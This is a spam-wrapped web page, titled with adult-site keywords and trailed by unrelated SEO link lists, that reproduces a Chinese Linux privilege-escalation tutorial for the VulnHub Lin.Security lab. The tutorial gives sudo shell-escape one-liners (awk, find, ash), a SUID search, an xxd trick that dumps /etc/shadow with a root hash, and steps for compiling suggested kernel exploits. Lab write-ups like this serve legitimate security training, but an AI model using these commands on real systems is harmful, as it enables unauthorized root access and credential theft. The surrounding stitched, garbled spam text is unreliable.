中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

網(wǎng)站開發(fā)設(shè)計公推廣普通話手抄報簡單又好看

網(wǎng)站開發(fā)設(shè)計公,推廣普通話手抄報簡單又好看,紹興做團(tuán)購的網(wǎng)站,小型局域網(wǎng)組建方案目錄 一、linux提權(quán)靶場下載與安裝 二、基礎(chǔ)提權(quán) 1.sudo提權(quán) 2.suid提權(quán) 3.taskset執(zhí)行bash 三、內(nèi)核提權(quán) 相關(guān)網(wǎng)站 https://gtfobins.github.io/#sudohttps://blog.csdn.net/weixin_43873557/article/details/113784146 一、linux提權(quán)靶場下載與安裝 #下載鏈接 http…

目錄

一、linux提權(quán)靶場下載與安裝

二、基礎(chǔ)提權(quán)?

?1.sudo提權(quán)

?2.suid提權(quán)

3.taskset執(zhí)行bash?

三、內(nèi)核提權(quán)?


相關(guān)網(wǎng)站

https://gtfobins.github.io/#+sudohttps://blog.csdn.net/weixin_43873557/article/details/113784146

一、linux提權(quán)靶場下載與安裝

#下載鏈接
https://www.vulnhub.com/entry/linsecurity-1,244/用戶名密碼:bob/secret#安裝與配置
1.修改默認(rèn)鍵盤布局[默認(rèn)不是美式鍵盤]
sudo awk 'BEGIN {system("/bin/sh")}'
[修改前\"符號是shift+2]vim /etc/default/keyboard
[講XKBLAYOUT改的值為us]setupcon2.配置網(wǎng)卡[Ubuntu 18通過netplan設(shè)置網(wǎng)絡(luò)]
vim /etc/netplan/50-cloud-init.yaml
[將enp0s3改為ens33]netplan apply

二、基礎(chǔ)提權(quán)?

?1.sudo提權(quán)

sudo權(quán)限是root把本來只能超級用戶執(zhí)行的命令賦予普通用戶執(zhí)行

1. sudo /bin/ash
2. sudo find . -exec /bin/sh \;-quit
3. sudo /bin/bash
sudo -i

?2.suid提權(quán)

suid簡介:SUID這個是uid +s的組合,s指的是特殊權(quán)限。一般情況下,用戶的權(quán)限是3位,比如0755這樣的,特殊權(quán)限默認(rèn)沒有配置,但是如果超級管理員希望用戶在執(zhí)行一些特殊權(quán)限文件時,擁有root的權(quán)限,就會配置特殊權(quán)限

使用find命令快速查找所有suid文件

find / -user root -perm -4000 -print 2>/dev/null

xxd訪問/etc/shadow

-rwsr-x--- 1 root itservices 18552 Apr 10  2018 /usr/bin/xxd

?itservices組具有執(zhí)行權(quán)限,通過/etc/group發(fā)現(xiàn)susan用戶屬于itservices用戶組,利用4.隱藏文件發(fā)現(xiàn)的密碼登錄susan用戶,進(jìn)行提權(quán)

cd home/susan
susan@linsecurity:/home/bob$ xxd "/etc/shadow" |xxd -r
root:$6$aorWKpxj$yOgku4F1ZRbqvSxxUtAYY2/6K/UU5wLobTSz/Pw5/ILvXgq9NibQ0/NQbOr1Wzp2bTbpNQr1jNNlaGjXDu5Yj1:17721:0:99999:7:::
daemon:*:17647:0:99999:7:::
bin:*:17647:0:99999:7:::
sys:*:17647:0:99999:7:::
sync:*:17647:0:99999:7:::
games:*:17647:0:99999:7:::

3.taskset執(zhí)行bash?

taskset?是一個用于將進(jìn)程綁定到特定的CPU核心上的命令

taskset?1?/bin/bash?-p

三、內(nèi)核提權(quán)?

將linux內(nèi)核提權(quán)速查腳本移到Linux系統(tǒng)中

查詢該文件

?

進(jìn)行解壓縮?

?

進(jìn)入解壓后的文件,并執(zhí)行里面的后綴為.sh的文件

?成功后就可以查看推薦的漏洞

?將推薦的漏洞下載到本地,復(fù)制到Linux系統(tǒng)中,進(jìn)行解壓縮

進(jìn)入解壓后的文件

?存在makefile,進(jìn)行編譯make

?查看編譯后的文件,發(fā)現(xiàn)新增,進(jìn)行執(zhí)行該文件

?運(yùn)行文件,不能成功,則換其他漏洞

?

http://www.risenshineclean.com/news/6968.html

相關(guān)文章:

  • thinkphp手機(jī)網(wǎng)站模板百度貼吧官網(wǎng)
  • 做商城外貿(mào)網(wǎng)站杭州優(yōu)化外包
  • 團(tuán)購網(wǎng)站前景seo刷排名公司
  • 九江網(wǎng)站建設(shè)寧波seo教程行業(yè)推廣
  • 政府網(wǎng)站建設(shè)發(fā)展前景口碑營銷5t
  • 上海網(wǎng)站域名備案處百度貼吧官網(wǎng)入口
  • 凡客網(wǎng)站的域名怎么做外鏈網(wǎng)址
  • wordpress 分享后可見自己怎么優(yōu)化我網(wǎng)站關(guān)鍵詞
  • 做網(wǎng)站建設(shè)最好學(xué)什么手機(jī)優(yōu)化什么意思
  • 做招聘網(wǎng)站都需要什么手續(xù)易推廣
  • 開源網(wǎng)站建設(shè)輿情系統(tǒng)
  • 在線做圖的網(wǎng)站長沙網(wǎng)站推廣 下拉通推廣
  • 江門網(wǎng)站制作cpa推廣聯(lián)盟平臺
  • 天河建設(shè)網(wǎng)站企業(yè)網(wǎng)站 seo
  • 有哪些做ppt的網(wǎng)站競價推廣賬戶競價托管公司
  • 電話銷售做網(wǎng)站打官司代理推廣
  • linchong WordPress搜索引擎優(yōu)化的流程是什么
  • cc域名 網(wǎng)站使用美國的空間需要備案嗎品牌廣告視頻
  • 企業(yè)手機(jī)網(wǎng)站建設(shè)流程免費(fèi)b2b網(wǎng)站有哪些
  • 溧水網(wǎng)站建設(shè)百度平臺推廣
  • 高端交互式網(wǎng)站建設(shè)百度百科詞條
  • 保定seo企業(yè)網(wǎng)站愛站工具seo綜合查詢
  • 怎么找網(wǎng)站做宣傳安卓aso優(yōu)化排名
  • 做整合營銷的網(wǎng)站企業(yè)網(wǎng)站推廣模式
  • 網(wǎng)站開發(fā)五人分工外貿(mào)出口平臺網(wǎng)站
  • 便宜的做網(wǎng)站公司網(wǎng)站推廣軟文
  • 提取網(wǎng)站子頁面郵箱中國國家培訓(xùn)網(wǎng)
  • 重慶企業(yè)網(wǎng)站建設(shè)報價十大最靠譜培訓(xùn)機(jī)構(gòu)
  • 旅游網(wǎng)站建設(shè)與規(guī)劃軟文寫手接單平臺
  • 做彩網(wǎng)站有哪些聊城網(wǎng)站開發(fā)